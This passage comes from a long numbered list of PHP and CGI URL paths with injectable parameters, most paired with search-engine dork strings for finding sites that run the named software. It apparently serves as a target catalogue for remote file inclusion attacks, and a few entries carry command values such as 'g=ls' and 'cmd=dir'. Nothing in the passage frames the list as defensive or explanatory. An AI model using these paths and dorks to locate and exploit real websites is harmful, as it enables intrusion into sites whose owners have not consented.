  4952. .php?root=”
  4953. .php?S=”
  4954. .php?searchcode_id=”
  4955. .php?sec=”
  4956. .php?secao=”
  4957. .php?sect=”
  4958. .php?sel=”
  4959. .php?server=”
  4960. .php?servico=”
  4961. .php?sg=”
  4962. .php?shard=”
  4963. .php?show=”
  4964. .php?sid=”
  4965. .php?site=”
  4966. .php?sourcedir=”
  4967. .php?start=”
  4968. .php?storyid=”
  4969. .php?str=”
  4970. .php?subject=”
  4971. .php?sufixo=”
  4972. .php?systempath=”
  4973. .php?t=”
  4974. .php?task=”
  4975. .php?teste=”
  4976. .php?theme_dir=”
  4977. .php?thread_id=”
  4978. .php?tid=”
  4979. .php?title=”
  4980. .php?to=”
  4981. .php?topic_id=”
  4982. .php?type=”
  4983. .php?u=”
  4984. .php?url=”
  4985. .php?urlFrom=”
  4986. .php?v=”
  4987. .php?var=”
  4988. .php?vi=”
  4989. .php?view=”
  4990. .php?visual=”
  4991. .php?wPage=”
  4992. .php?y=”
  4993. /components/com_forum/download.php?phpbb_root_path= com_forum
  4994. [Script Path]/admin/index.php?o= admin/index.php”
  4995. /admin/index.php?o= admin/index.php”
  4996. index.php?menu=deti&page= index.php?menu=deti&page”
  4997. include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
  4998. /classes/adodbt/sql.php?classes_dir= “index2.php?option=rss”
  4999. components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
  5000. index.php?RP_PATH= reviewpost
  5001. index.php?pagename= phpquiz
  5002. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
  5003. /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
  5004. components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “com_phpshop”
  5005. SQuery/lib/gore.php?libpath= “/SQuery/”
  5006. m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
  5007. wamp_dir/setup/yesno.phtml?no_url= “setup”
  5008. components/com_forum/download.php?phpbb_root_path= “com_forum”
  5009. index.php?p= “/index.php?p=*.php”
  5010. index.php?pag= “/index.php?pag=*.php”
  5011. template.php?page= “/template.php?page=*.php”
  5012. main.php?page= “/main.php?page=*.php”
  5013. index2.php?pag= “/index2.php?pag=*.php”
  5014. home.php?pag= “/home.php?pag=*.php”
  5015. index.php?page= “/index.php?page=*.php”
  5016. default.php?page= “/default.php?page=*.php”
  5017. inc/cmses/aedatingCMS.php?dir[inc]= “flashchat”
  5018. /modules/vwar/admin/admin.php?vwar_root= vwar
  5019. bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum
  5020. encapscms_PATH/core/core.php?root= encapscms_PATH
  5021. inc/session.php?sessionerror=0&lang= inc
  5022. path/index.php?function=custom&custom= path
  5023. [MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]
  5024. /inc/irayofuncs.php?irayodirhack= “/inc/”
  5025. index.php?function=custom&custom= custom
  5026. cyberfolio/portfolio/msg/view.php?av= cyberfolio
  5027. /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT
  5028. *mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
  5029. *pivot/modules/module_db.php?pivot_path=
  5030. *inc/header.php/step_one.php?server_inc=
  5031. *inst/index.php?lng=../../include/main.inc&G_PATH=
  5032. *inc/pipe.php?HCL_path=
  5033. *include/new-visitor.inc.php?lvc_include_dir=
  5034. *includes/header.php?systempath=
  5035. *support/mailling/maillist/inc/initdb.php?absolute_path=
  5036. *coppercop/theme.php?THEME_DIR=
  5037. *zentrack/index.php?configFile=
  5038. *include/write.php?dir=
  5039. includes/header.php?systempath=
  5040. myPHPCalendar/admin.php?cal_dir=
  5041. zboard/zboard.php
  5042. My_eGery/public/displayCategory.php?basepath=
  5043. modules/My_eGery/public/displayCategory.php?basepath=
  5044. modules/4nAlbum/public/displayCategory.php?basepath=
  5045. modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
  5046. modules/xgery/upgrade_album.php?GERY_BASEDIR=
  5047. modules/coppermine/include/init.inc.php?CPG_M_DIR=
  5048. library/editor/editor.php?root=
  5049. library/lib.php?root=
  5050. e107/e107_handlers/secure_img_render.php?p=
  5051. index.php?open=
  5052. index.php?configFile=
  5053. template.php?pagina
  5054. path_of_cpcommerce/_functions.php?prefix=
  5055. gery/init.php?HTTP_POST_VARS=
  5056. modules/tasks/viewgantt.php?root_dir=
  5057. cgi-bin/index.cgi?page=
  5058. cgi-bin/ikonboard.cgi
  5059. cgi-bin/acart/acart.pl?&page=
  5060. cgi-bin/ubb/ubb.cgi?g=
  5061. cgi-bin/hinsts.pl?
  5062. cgi-bin/bp/bp-lib.pl?g=
  5063. ccbill/whereami.cgi?g=ls
  5064. cgi-bin/1/cmd.cgi
  5065. cgi-sys/guestbook.cgi?user=cpanel&template=
  5066. account.php?action= account.php?action=
  5067. account.php?action= iurl:”account.php?action=”
  5068. account.php?action= iurl:”.php?action=”
  5069. account.php?action= .php?action=
  5070. accounts.php?command= .php?command=”
  5071. addmedia.php?factsfile[$LANGUAGE]= phpGedView
  5072. .php?p=”
  5073. announcements.php?phpraid_dir= “phpraid”
  5074. announcements.php?phpraid_dir= “phpraid signup”
  5075. announcements.php?phpraid_dir= php raid
  5076. announcements.php?phpraid_dir= phpraid
  5077. announcements.php?phpraid_dir= phpraid signup
  5078. arg.php?arg= .php?arg=
  5079. args.php?arg= .php?arg=
  5080. atom.php5?page= .php5?id=
  5081. auto.php?inc= .php?inc=”
  5082. auto.php?page= auto.php?page=
  5083. base.php?f1= base.php?f1=”
  5084. base.php?f1= .php?f1=”
  5085. board.php?see= board.php?see=”
  5086. board.php?see= .php?see=”
  5087. book.php5?page= php5?page=
  5088. /calendar.php?l= calendar.php?l=”
  5089. /calendar.php?l= calendar.php?l=
  5090. /calendar.php?p= calendar.php?p=”
  5091. /calendar.php?p= calendar.php?p=
  5092. /calendar.php?pg= calendar.php?pg=”
  5093. /calendar.php?pg= calendar.php?pg=
  5094. /calendar.php?s= calendar.php?s=”
  5095. /calendar.php?s= calendar.php?s=
  5096. /addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/”
  5097. /addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/
  5098. /addpost_newpoll.php?addpoll=preview&thispath= “/ubbthreads/”
  5099. /addpost_newpoll.php?addpoll=preview&thispath= “ubbthreads”
  5100. /addpost_newpoll.php?addpoll=preview&thispath= ubbthreads
  5101. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= “com_remository”
  5102. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= “com_remository
  5103. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository
  5104. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
  5105. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= “Mambo”
  5106. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo
  5107. /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat
  5108. /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= “com_serverstat”
  5109. canal.php?meio= .php?meio=”
  5110. /classes/adodbt/sql.php?classes_dir= “adobt”
  5111. /classes/adodbt/sql.php?classes_dir= adobt
  5112. /classified_right.php?language_dir= “classified.php”
  5113. /classified_right.php?language_dir= classified.php
  5114. /classified_right.php?language_dir= classified.php phpbazar
  5115. /classified_right.php?language_dir= “phpbazar”
  5116. /classified_right.php?language_dir= phpbazar
  5117. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “phpCOIN”
  5118. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN
  5119. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “phpCOIN 1.2.3”
  5120. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3
  5121. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3
  5122. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
  5123. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= “com_extended_registration”
  5124. /components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms”
  5125. /components/com_facileforms/facileforms.frame.php?ff_compath= “com_facileforms”
  5126. /components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms
  5127. components/com_performs/performs.php?mosConfig_absolute_path= com_performs
  5128. components/com_performs/performs.php?mosConfig_absolute_path= “com_performs”
  5129. /components/com_zoom/includes/database.php?mosConfig_absolute_path= “com_zoom”
  5130. /components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom
  5131. /components/com_zoom/includes/database.php?mosConfig_absolute_path= “index.php?option=”com_zoom”
  5132. content.php?page= “content.php?page=*.php”
  5133. /embed/day.php?path= “Calendar”
  5134. /embed/day.php?path= Calendar
  5135. /embed/day.php?path= “Login to Calendar”
  5136. /embed/day.php?path= Login to Calendar
  5137. /embed/day.php?path= “WebCalendar”
  5138. /embed/day.php?path= WebCalendar
  5139. enc/content.php?Home_Path= “doodle”
  5140. enc/content.php?Home_Path= doodle
  5141. enc/content.php?Home_Path= “doodle cart”
  5142. enc/content.php?Home_Path= doodle cart
  5143. enc/content.php?Home_Path= powered by doodle cart
  5144. /header.php?abspath= “MobilePublisherPHP”
  5145. /header.php?abspath= MobilePublisherPHP
  5146. impex/ImpExData.php?systempath= intext:powered by vbulletin
  5147. impex/ImpExData.php?systempath= powered by vbulletin
  5148. impex/ImpExData.php?systempath= “vbulletin”
  5149. impex/ImpExData.php?systempath= vbulletin
  5150. /includes/dbal.php?eqdkp_root_path= “EQdkp”
  5151. /includes/dbal.php?eqdkp_root_path= EQdkp
  5152. /includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
  5153. /includes/dbal.php?eqdkp_root_path= powered by EQdkp
  5154. /includes/kb_constants.php?module_root_path= “Base”
  5155. /includes/kb_constants.php?module_root_path= Base
  5156. /includes/kb_constants.php?module_root_path= “Knowledge”
  5157. /includes/kb_constants.php?module_root_path= Knowledge
  5158. /includes/kb_constants.php?module_root_path= “Knowledge Base”
  5159. /includes/kb_constants.php?module_root_path= Knowledge Base
  5160. /includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
  5161. /includes/kb_constants.php?module_root_path= Powered by Knowledge Base
  5162. index1.php?= “index1.php?=”
  5163. index1.php?= index1.php?=
  5164. index1.php?= “index1.php?=*.php?
  5165. index2.php?= “index2.php?=”
  5166. index2.php?= index2.php?=
  5167. index2.php?= “index2.php?=*.php?”
  5168. index.php?body= index.php?body=
  5169. index.php?body= “index.php?body=”
  5170. index.php?go1= index.php?go1=
  5171. index.php?go1= “index.php?go1=”
  5172. index.php?go= “index.php?go=”
  5173. index.php?go= index.php?go=
  5174. index.php?pageurl= “index.php?pageurl=”
  5175. index.php?pageurl= “index.php?pageurl=*.php”
  5176. index.php?pageurl= index.php?pageurl=*.php
  5177. index.php?pageurl= “index.php?pageurl=*.php
  5178. index.php?pagina1= “index.php?pagina1=”
  5179. index.php?pagina1= index.php?pagina1=
  5180. index.php?pagina= “index.php?pagina=”
  5181. index.php?pagina= “index.php?pagina=*.php”
  5182. index.php?site1= index.php?site1=
  5183. index.php?site1= “index.php?site1=”
  5184. index.php?site= “index.php?site=”
  5185. index.php?site= index.php?site=
  5186. index.php?var1= “index.php?var1=”
  5187. index.php?var1= index.php?var1=
  5188. index.php?var2= index.php?var2=
  5189. index.php?var= index.php?va21=
  5190. index.php?var= index.php?var=
  5191. index.php?var= “index.php?var1=”
  5192. index.php?var= index.php?var1=
  5193. index.php?var= “index.php?var2=”
  5194. index.php?var= index.php?var2=
  5195. index.php?var= “index.php?var=*.php”
  5196. index.php?var= index.php?var=*.php
  5197. /login.php?dir= login.php?dir=
  5198. /login.php?dir= “login.php?dir=”
  5199. main.php?id= “main.php?id=*.php”
  5200. /main.php?sayfa= “main.php?sayfa=”
  5201. /main.php?sayfa= main.php?sayfa=
  5202. /mcf.php?content= mcf.php”
  5203. mcf.php?content= mcf.php”
  5204. mcf.php?content= “mcf.php”
  5205. mcf.php?content= mcf.php
  5206. /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
  5207. /modules/TotalCalendar/about.php?inc_dir= “TotalCalendar”
  5208. /modules/TotalCalendar/about.php?inc_dir= TotalCalendar
  5209. /modules/vwar/admin/admin.php?vwar_root= “vwar”
  5210. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= “index.php?id=”
  5211. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=
  5212. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= “phpwcms/index.php?id=”
  5213. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=
  5214. skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer”
  5215. skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer
  5216. skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
  5217. skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS
  5218. skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= “CMS”
  5219. skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
  5220. /skin/zero_vote/error.php?dir= “skin/zero_vote/error.php”
  5221. /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
  5222. /sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
  5223. /sources/functions.php?CONFIG[main_path]= “Powered By ScozNews”
  5224. /sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)
  5225. /sources/functions.php?CONFIG[main_path]= Powered By ScozNews
  5226. /sources/functions.php?CONFIG[main_path]= “ScozNews”
  5227. /sources/functions.php?CONFIG[main_path]= ScozNews
  5228. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Aardvark”
  5229. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark
  5230. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Aardvark TopSites”
  5231. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark TopSites
  5232. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2”
  5233. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2
  5234. /sources/template.php?CONFIG[main_path]= (Powered By ScozNews)
  5235. /sources/template.php?CONFIG[main_path]= Powered By ScozNews
  5236. /sources/template.php?CONFIG[main_path]= “ScozNews”
  5237. /sources/template.php?CONFIG[main_path]= ScozNews
  5238. /surveys/survey.inc.php?path= surveys
  5239. /surveys/survey.inc.php?path= “surveys”
  5240. /tags.php?BBCodeFile= intitle:”Tagger LE”
  5241. /tags.php?BBCodeFile= intitle:”Tagger LE” tags.php
  5242. /tags.php?BBCodeFile= “Tagger LE”
  5243. /tags.php?BBCodeFile= Tagger LE
  5244. /tags.php?BBCodeFile= “tags.php”
  5245. /tags.php?BBCodeFile= tags.php
  5246. /templates/headline_temp.php?nst_inc= intitle:fusion:news:management
  5247. /templates/headline_temp.php?nst_inc= ‘fusion”
  5248. /templates/headline_temp.php?nst_inc= “fusion”
  5249. /templates/headline_temp.php?nst_inc= fusion
  5250. /templates/headline_temp.php?nst_inc= fusion:news:management:system
  5251. /templates/headline_temp.php?nst_inc= “management”
  5252. /templates/headline_temp.php?nst_inc= management
  5253. /templates/headline_temp.php?nst_inc= “news”
  5254. /templates/headline_temp.php?nst_inc= news
  5255. /templates/headline_temp.php?nst_inc= “system”
  5256. /templates/headline_temp.php?nst_inc= system
  5257. /tools/send_reminders.php?includedir= “day.php?date=”
  5258. /tools/send_reminders.php?includedir= day.php?date=
  5259. /ws/get_events.php?includedir= /WebCalendar/
  5260. /ws/get_events.php?includedir= “/WebCalendar/”
  5261. /ws/get_events.php?includedir= “WebCalendar”
  5262. /zipndownload.php?PP_PATH= “PhotoPost”
  5263. /zipndownload.php?PP_PATH= PhotoPost
  5264. /zipndownload.php?PP_PATH= “PhotoPostP”
  5265. /zipndownload.php?PP_PATH= “PhotoPost PHP”
  5266. /zipndownload.php?PP_PATH= “PhotoPost PHP 4.6″
  5267. /zipndownload.php?PP_PATH= PhotoPost PHP 4.6
  5268. /zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6
  5269. cmd.php?arg= .php?arg=
  5270. /codebb/lang_select?phpbb_root_path= codebb
  5271. /codebb/lang_select?phpbb_root_path= codebb 1.1b3
  5272. components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery
  5273. components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery
  5274. components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php
  5275. content.php?inc= .php?inc=”
  5276. content.php?seite= content.php?seite=
  5277. content.php?seite= .php?seite=
  5278. dbase.php?action= dbase.php
  5279. dbase.php?action= dbase.php?action=
  5280. dbase.php?action= .php?action=
  5281. default.php?arquivo= .php?arquivo=
  5282. default.php?vis= .php?vis=”
  5283. define.php?term= .php?term=”
  5284. detail.php?prod= detail.php?prod=”
  5285. detail.php?prod= .php?prod=”
  5286. details.php?loc= details.php?loc=
  5287. details.php?loc= .php?loc=
  5288. directions.php?loc= directions.php?loc=
  5289. direct.php?loc= direct.php?loc=
  5290. display.php?f= display.php?f=
  5291. display.php?file= display.php?file=
  5292. display.php?lang= display.php?lang=
  5293. display.php?l= display.php?l=
  5294. display.php?ln= display.php?ln=
  5295. display.php?pag= display.php?pag=
  5296. display.php?page= display.php?page=”
  5297. display.php?page= .php?page=”
  5298. display.php?page=&lang= display.php?page=”
  5299. display.php?page=&lang= .php?page=”
  5300. display.php?p= display.php?p=
  5301. display.php?pg= display.php?pg=
  5302. display.php?s= display.php?s=
  5303. display.php?table= display.php?table=
  5304. display.php?table= .php?table=
  5305. download.php?sub= “download.php?sub=”
  5306. download.php?sub= download.php?sub=
  5307. eng.php?img= eng.php?img=
  5308. eng.php?img= .php?img=
  5309. /exibir.php?arquivo= .php?arquivo=
  5310. experts.php?sub= “experts.php?sub=”
  5311. experts.php?sub= experts.php?sub=
  5312. forum.php?seite= .php?seite=
  5313. frag.php?exec= frag.php”
  5314. frag.php?exec= frag.php?exec=”
  5315. frag.php?exec= .php?exec=”
  5316. frame.php?loc= .php?loc=”
  5317. galerie.php?do= .php?do=”
  5318. glossary.php?term= .php?term=”
  5319. handlinger.php?vis= .php?vis=”
  5320. /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP Ged View
  5321. /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP GedView
  5322. /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView
  5323. /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView <= 3.3.7
  5324. home1.php?ln= .php?ln=
  5325. home2.php?ln= .php?ln=
  5326. home.php?a= home.php?a="
  5327. home.php?a= .php?a="
  5328. home.php?act= "home.php?act="
  5329. home.php?act= home.php?act=
  5330. home.php?arg= .php?arg=
  5331. home.php?func= .php?func="
  5332. home.php?i= "home.php?i="
  5333. home.php?i= home.php?i=
  5334. home.php?inc= "home.php?inc="
  5335. home.php?inc= home.php?inc=
  5336. home.php?ln= .php?ln=
  5337. home.php?ltr= .php?ltr="
  5338. home.php?sit= .php?sit="
  5339. home.php?table= .php?table=
  5340. image.php?img= image.php?img=
  5341. image.php?img= .php?img=
  5342. img.php?loc= img.php?loc="
  5343. img.php?loc= .php?loc="
  5344. inc.php?inc= .php?inc="
  5345. index1.php?arg= .php?arg=
  5346. index1.php?arq= .php?arq=
  5347. index1.php?func= .php?func="
  5348. index1.php?inc= .php?inc="
  5349. index1.php?lk= .php?lk="
  5350. /index1.php?ln= .php?ln=
  5351. index1.php?ltr= .php?ltr="
  5352. index1.php?mid= index1.php?mid=
  5353. index1.php?page= index1.php?page="
  5354. index1.php?p= .php?p="
  5355. index1.php?p= .php?pag="
  5356. index1.php?p= .php?page="
  5357. index1.php?p= .php?pg="
  5358. index1.php?s= index1.php?s="
  5359. index1.php?show= index1.php?show="
  5360. index1.php?show= .php?show="
  5361. index1.php?table= .php?table=
  5362. index2.php?arg= .php?arg=
  5363. index2.php?arq= .php?arq=
  5364. index2.php?c= index2.php?c="
  5365. index2.php?c= .php?c="
  5366. index2.php?cont= index2.php?cont="
  5367. index2.php?cont= .php?cont="
  5368. index2.php?content= index2.php?cont="
  5369. index2.php?content= index2.php?content="
  5370. index2.php?content= .php?content="
  5371. index2.php?content= index2.php?content=
  5372. index2.php?content= .php?content=
  5373. index2.php?i= /index2.php?i=
  5374. index2.php?inc= .php?inc="
  5375. index2.php?l= .php?l="
  5376. index2.php?lg= index.php?lg="
  5377. index2.php?lk= .php?lk="
  5378. index2.php?ln= index.php?ln="
  5379. index2.php?ln= .php?ln="
  5380. index2.php?lng= index.php?lng="
  5381. index2.php?loca= index2.php?loca=
  5382. index2.php?loca= .php?loca=
  5383. index2.php?meio= .php?meio=
  5384. index2.php?s= index2.php?s="
  5385. index2.php?s= .php?s="
  5386. index2.php?table= .php?table=
  5387. index2.php?x= index2.php?x=
  5388. index2.php?x= .php?x=
  5389. index.php3?act= index.php3?act=
  5390. index.php3?act= .php3?act=
  5391. index.php3?act= .php3?act="
  5392. index.php3?file= .php3?f="
  5393. index.php3?file= .php3?file="
  5394. index.php3?id= index.php3?id=
  5395. index.php3?i= index.php3?i=
  5396. index.php3?lang= index.php3?lang=
  5397. index.php3?l= index.php3?l=
  5398. index.php3?page= index.php3?page=
  5399. index.php3?pag= index.php3?pag=
  5400. index.php3?p= index.php3?p="
  5401. index.php3?p= index.php3?pag="
  5402. index.php3?p= index.php3?page="
  5403. index.php3?p= index.php3?pg="
  5404. index.php3?pg= index.php3?pg=
  5405. index.php3?p= index.php3?p=
  5406. index.php3?s= index.php3?s="
  5407. index.php3?s= index.php3?s=
  5408. index.php3?s= .php3?s=
  5409. index.php3?s= .php3?s="
  5410. index.php4?lang= index.php4?lang="
  5411. index.php4?lang= .php4?lang="
  5412. index.php4?lang= .php4?lang=
  5413. index.php5?lang= index.php5?lang="
  5414. index.php5?lang= index.php5?lang=
  5415. index.php5?lang= .php5?lang="
  5416. index.php?a= index.php?a="
  5417. index.php?a= .php?a="
  5418. index.php?acao= index.php?acao=
  5419. index.php?acao= .php?acao=
  5420. index.php?act= "index.php?act="
  5421. index.php?act= index.php?act=
  5422. index.php?action= index.php?action="
  5423. index.php?action= .php?action="
  5424. index.php?arg= index.php?arg=
  5425. index.php?arg= .php?arg=
  5426. index.php?arq= index.php?arq=
  5427. index.php?arq= .php?arq=
  5428. index.php?arquivo= .php?arquivo=
  5429. index.php?ba= index.php?ba="
  5430. index.php?b= index.php?b="
  5431. index.php?bas= index.php?bas="
  5432. index.php?bas= .php?bas="
  5433. index.php?cal= index.php?cal=
  5434. index.php?cal= "index.php?cal="
  5435. index.php?cal= ".php?cal="
  5436. index.php?c= index.php?c="
  5437. index.php?cal= .php?cal=
  5438. index.php?c= index.php?c=
  5439. index.php?c= "index.php?c="
  5440. index.php?c= ".php?c="
  5441. /index.php?cms= /index.php?cms=
  5442. /index.php?cms= /index.php?cms="
  5443. index.php?command= index.php?command="
  5444. index.php?command= .php?command="
  5445. index.php?content= index.php?content=
  5446. index.php?content= .php?content=
  5447. index.php?c= .php?c=
  5448. index.php?d1= .php?d1="
  5449. index.php?def= index.php?def="
  5450. index.php?def= .php?def="
  5451. index.php?def= index.php?def=
  5452. /index.php?dn= /index.php?dn=
  5453. /index.php?dn= index.php?dn="
  5454. /index.php?dn= .php?dn=
  5455. /index.php?dn= .php?dn="
  5456. index.php?dok= index.php?dok="
  5457. index.php?dok= .php?dok="
  5458. index.php?e= index.php?e="
  5459. index.php?exec= index.php?exec=
  5460. index.php?exec= .php?exec=
  5461. index.php?f1= .php?f1="
  5462. index.php?f= index.php?f="
  5463. index.php?fase= index.php?fase="
  5464. index.php?fase= .php?fase="
  5465. index.php?file= index.php?file="
  5466. index.php?fn= index.php?fn="
  5467. index.php?fn= .php?fn="
  5468. index.php?fPage= index.php?fPage="
  5469. index.php?fPage= index.php?fPage=
  5470. index.php?fPage= .php?fPage=
  5471. index.php?fPage= .php?fPage="
  5472. index.php?fset= .php?fset="
  5473. index.php?func= .php?func="
  5474. index.php?goto= index.php?goto="
  5475. index.php?goto= .php?goto="
  5476. index.php?id=1&lang= index.php?i=
  5477. index.php?id=1&lang= "index.php?id="
  5478. index.php?id=1&lang= index.php?id=
  5479. index.php?id=1&lang= ".php?id="
  5480. index.php?id= index.php?id="
  5481. /index.php?id=&lang= index.php?id="
  5482. /index.php?id=&lang= .php?id="
  5483. index.php?id=&lang= "index.php?id="
  5484. index.php?id=&lang= ".php?id="
  5485. /index.php?id=&page= index.php?id="
  5486. /index.php?id=&page= .php?id="
  5487. index.php?inc= .php?inc="
  5488. index.php?ir= ".php?ir="
  5489. /index.php?lang=en&cat= index.php?lang="
  5490. /index.php?lang=en&cat= .php?lang="
  5491. /index.php?lang=en&page= index.php?lang="
  5492. /index.php?lang=en&page= .php?lang="
  5493. /index.php?lang=en&page= index.php?lang=
  5494. index.php?lang=en&page= index.php?lang=
  5495. /index.php?lang=en&page= .php?lang=
  5496. index.php?lang=en&page= .php?lang=
  5497. index.php?lang= "index.php?lang="
  5498. index.php?lang= index.php?lang=
  5499. index.php?lang=&page= index.php?lang=
  5500. index.php?lang=&page= .php?lang=
  5501. index.php?lg= "index.php?lg="
  5502. index.php?lg= index.php?lg=
  5503. index.php?lk= .php?lk="
  5504. /index.php?ln= .php?ln=
  5505. index.php?lng= "index.php?lng="
  5506. index.php?lng= index.php?lng=
  5507. index.php?ln= "index.php?ln="
  5508. index.php?ln= index.php?ln=
  5509. index.php?ln= ".php?ln="
  5510. index.php?lnk= index.php?lnk=
  5511. index.php?lnk= .php?lnk=
  5512. index.php?lnk= "index.php?lnk="
  5513. index.php?lnk= ".php?lnk="
  5514. index.php?ln= .php?ln=
  5515. index.php?loca= index.php?loca=
  5516. /index.php?loc= .php?loc="
  5517. index.php?loca= .php?loca=
  5518. /index.php?loc=&cat= index.php?loc="
  5519. /index.php?loc=&cat= .php?loc="
  5520. /index.php?loc=&lang= index.php?loc="
  5521. /index.php?loc=&lang= .php?loc="
  5522. /index.php?loc=&page= index.php?loc="
  5523. /index.php?loc= .php?loc=
  5524. /index.php?loc=start&page= index.php?loc="
  5525. index.php?ltr= index.php?ltr="
  5526. index.php?ltr= .php?ltr="
  5527. index.php?main= .php?main="
  5528. index.php?m= index.php?m="
  5529. index.php?meio= index.php?meio="
  5530. index.php?meio= index.php?meio=
  5531. index.php?meio= .php?meio=
  5532. index.php?meio= .php?meio="
  5533. index.php?mf= index.php?mf=
  5534. index.php?mf= .php?mf=
  5535. index.php?mf= .php?mf="
  5536. index.php?mid= index.php?mid="
  5537. index.php?mid= index.php?mid=
  5538. index.php?mid= .php?mid=
  5539. index.php?mid= .php?mid="
  5540. index.php?middle= index.php?middle="
  5541. index.php?middle= index.php?middle=
  5542. index.php?middle= .php?middle="
  5543. index.php?mn= index.php?mn="
  5544. index.php?mn= .php?mn="
  5545. index.php?mod= index.php?mod="
  5546. index.php?mod= .php?mod="
  5547. index.php?new= index.php?new="
  5548. index.php?news= index.php?news="
  5549. index.php?page1= index.php?page1="
  5550. index.php?page1= .php?page1="
  5551. index.php?page= php5?page=
  5552. index.php?page= index.php?page=
  5553. index.php?page=&lang= index.php?p=
  5554. index.php?page=&lang= index.php?pag=
  5555. index.php?page=&lang= index.php?page=
  5556. index.php?page=&lang= index.php?pg=
  5557. index.php?page=&lang= .php?p=
  5558. index.php?page=&lang= .php?pag=
  5559. index.php?page=&lang= .php?page=
  5560. index.php?page=&lang= .php?pg=
  5561. index.php?pageN= .php?pageN="
  5562. index.php?pager= index.php?pager=
  5563. index.php?pager= .php?pager=
  5564. index.php?pagina= index.php?pagina=
  5565. index.php?pag= "index.php?pag="
  5566. index.php?pag= index.php?pag=
  5567. index.php?p= index.php?p="
  5568. index.php?pg= "index.php?pg="
  5569. index.php?pg= index.php?pg=
  5570. index.php?prod= .php?prod="
  5571. index.php?prod= .php?product="
  5572. index.php?product= .php?prod="
  5573. index.php?product= .php?product="
  5574. index.php?r= index.php?r="
  5575. index.php?s= index.php?s="
  5576. index.php?s= index.php?s=
  5577. index.php?s= .php?s=
  5578. index.php?s= .php?s="
  5579. index.php?secao= index.php?secao=
  5580. index.php?secao= .php?secao=
  5581. index.php?secao= "index.php?secao="
  5582. index.php?secao= ".php?secao="
  5583. /index.php?seccion= /index.php?seccion=
  5584. /index.php?seccion= .php?seccion=
  5585. index.php?sec= "index.php?sec="
  5586. index.php?sec= index.php?sec=
  5587. /index.php?seite= /index.php?seite=
  5588. /index.php?seite= .php?seite=
  5589. index.php?select= .php?select="
  5590. index.php?select= index.php?select=
  5591. index.php?select= .php?select=
  5592. index.php?set= index.php?set="
  5593. index.php?set= index.php?set=
  5594. index.php?set= .php?set=
  5595. index.php?set= .php?set="
  5596. index.php?sf= index.php?sf="
  5597. index.php?show= .php?show="
  5598. index.php?s= "index.php?s="
  5599. index.php?sit= index.php?sit="
  5600. index.php?sit= .php?sit="
  5601. /index.php?slang= /index.php?slang=
  5602. /index.php?slang= "index.php?slang="
